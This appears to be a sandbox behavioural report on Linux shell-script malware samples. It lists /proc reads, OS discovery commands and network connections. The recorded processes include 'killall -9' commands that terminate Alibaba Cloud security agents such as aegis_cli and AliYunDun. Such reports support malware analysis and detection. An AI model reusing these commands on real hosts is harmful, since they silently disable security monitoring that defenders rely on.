File opened for reading /proc/458/stat /usr/bin/killall N/A
File opened for reading /proc/1205/stat /usr/bin/killall N/A
File opened for reading /proc/1241/cmdline /usr/bin/killall N/A
File opened for reading /proc/315/stat /usr/bin/killall N/A
File opened for reading /proc/405/stat /usr/bin/killall N/A
File opened for reading /proc/1035/stat /usr/bin/killall N/A
File opened for reading /proc/173/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/408/stat /usr/bin/killall N/A
File opened for reading /proc/1100/stat /usr/bin/killall N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/1163/stat /usr/bin/killall N/A
File opened for reading /proc/1242/stat /usr/bin/killall N/A
File opened for reading /proc/176/stat /usr/bin/killall N/A
File opened for reading /proc/655/cmdline /usr/bin/killall N/A
File opened for reading /proc/1306/cmdline /usr/bin/killall N/A
File opened for reading /proc/1212/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/241/stat /usr/bin/killall N/A
File opened for reading /proc/1160/stat /usr/bin/killall N/A
File opened for reading /proc/1100/stat /usr/bin/killall N/A
File opened for reading /proc/1306/cmdline /usr/bin/killall N/A
File opened for reading /proc/1145/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/1306/cmdline /usr/bin/killall N/A
File opened for reading /proc/406/stat /usr/bin/killall N/A
File opened for reading /proc/446/stat /usr/bin/killall N/A
File opened for reading /proc/448/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/80/stat /usr/bin/killall N/A
File opened for reading /proc/315/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/31/stat /usr/bin/killall N/A
File opened for reading /proc/1134/stat /usr/bin/killall N/A
File opened for reading /proc/510/stat /usr/bin/killall N/A
File opened for reading /proc/1078/cmdline /usr/bin/killall N/A
File opened for reading /proc/404/stat /usr/bin/killall N/A
File opened for reading /proc/1117/stat /usr/bin/killall N/A
File opened for reading /proc/315/cmdline /usr/bin/killall N/A
File opened for reading /proc/1035/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/1325/stat /usr/bin/killall N/A
File opened for reading /proc/1078/cmdline /usr/bin/killall N/A
File opened for reading /proc/975/stat /usr/bin/killall N/A
File opened for reading /proc/164/stat /usr/bin/killall N/A
File opened for reading /proc/647/stat /usr/bin/killall N/A
File opened for reading /proc/1045/cmdline /usr/bin/killall N/A
File opened for reading /proc/1068/stat /usr/bin/killall N/A
File opened for reading /proc/1104/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/1118/cmdline /usr/bin/killall N/A
File opened for reading /proc/315/stat /usr/bin/killall N/A
File opened for reading /proc/202/stat /usr/bin/killall N/A
File opened for reading /proc/776/cmdline /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/1241/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/176/stat /usr/bin/killall N/A
File opened for reading /proc/1182/stat /usr/bin/killall N/A
File opened for reading /proc/278/stat /usr/bin/killall N/A
File opened for reading /proc/1253/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/32/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/1123/cmdline /usr/bin/killall N/A
File opened for reading /proc/668/stat /usr/bin/killall N/A
File opened for reading /proc/329/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/1178/stat /usr/bin/killall N/A
File opened for reading /proc/1082/stat /usr/bin/killall N/A
File opened for reading /proc/1253/cmdline /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/728/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/1187/stat /usr/bin/killall N/A
File opened for reading /proc/1111/stat /usr/bin/killall N/A
File opened for reading /proc/250/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/500/stat /usr/bin/killall N/A
File opened for reading /proc/476/cmdline /usr/bin/killall N/A
File opened for reading /proc/1101/stat /usr/bin/killall N/A
File opened for reading /proc/35/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/98/stat /usr/bin/killall N/A
File opened for reading /proc/947/stat /usr/bin/killall N/A
File opened for reading /proc/35/stat /usr/bin/killall N/A
File opened for reading /proc/1510/stat /usr/bin/killall N/A
File opened for reading /proc/496/cmdline /usr/bin/killall N/A
File opened for reading /proc/1292/cmdline /usr/bin/killall N/A
File opened for reading /proc/1150/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/1356/stat /usr/bin/killall N/A
File opened for reading /proc/1164/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/1091/stat /usr/bin/killall N/A
File opened for reading /proc/1284/stat /usr/bin/killall N/A
File opened for reading /proc/1292/cmdline /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/1246/cmdline /usr/bin/killall N/A
File opened for reading /proc/32/stat /usr/bin/killall N/A
File opened for reading /proc/1187/stat /usr/bin/killall N/A
File opened for reading /proc/1054/stat /usr/bin/killall N/A
File opened for reading /proc/1328/stat /usr/bin/killall N/A
File opened for reading /proc/1237/stat /usr/bin/killall N/A
File opened for reading /proc/1516/stat /usr/bin/killall N/A
File opened for reading /proc/1115/stat /usr/bin/killall N/A
File opened for reading /proc/1356/stat /usr/bin/killall N/A
File opened for reading /proc/476/cmdline /usr/bin/killall N/A
File opened for reading /proc/32/stat /usr/bin/killall N/A
File opened for reading /proc/1225/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/1127/cmdline /usr/bin/killall N/A
File opened for reading /proc/1178/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/89/stat /usr/bin/killall N/A
File opened for reading /proc/426/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240226-en

Max time kernel

25s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/143/stat /usr/bin/killall N/A
File opened for reading /proc/114/stat /usr/bin/killall N/A
File opened for reading /proc/320/stat /usr/bin/killall N/A
File opened for reading /proc/321/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/519/stat /usr/bin/killall N/A
File opened for reading /proc/316/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/319/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/114/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/700/cmdline /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/695/cmdline /usr/bin/killall N/A
File opened for reading /proc/114/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/104/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/228/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/320/stat /usr/bin/killall N/A
File opened for reading /proc/736/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/316/stat /usr/bin/killall N/A
File opened for reading /proc/370/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/395/stat /usr/bin/killall N/A
File opened for reading /proc/395/stat /usr/bin/killall N/A
File opened for reading /proc/723/stat /usr/bin/killall N/A
File opened for reading /proc/321/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/723/cmdline /usr/bin/killall N/A
File opened for reading /proc/722/stat /usr/bin/killall N/A
File opened for reading /proc/316/stat /usr/bin/killall N/A
File opened for reading /proc/725/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/484/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/725/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/520/stat /usr/bin/killall N/A
File opened for reading /proc/470/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/228/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/usr/bin/lsb_release

[lsb_release -a]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp

Files

N/A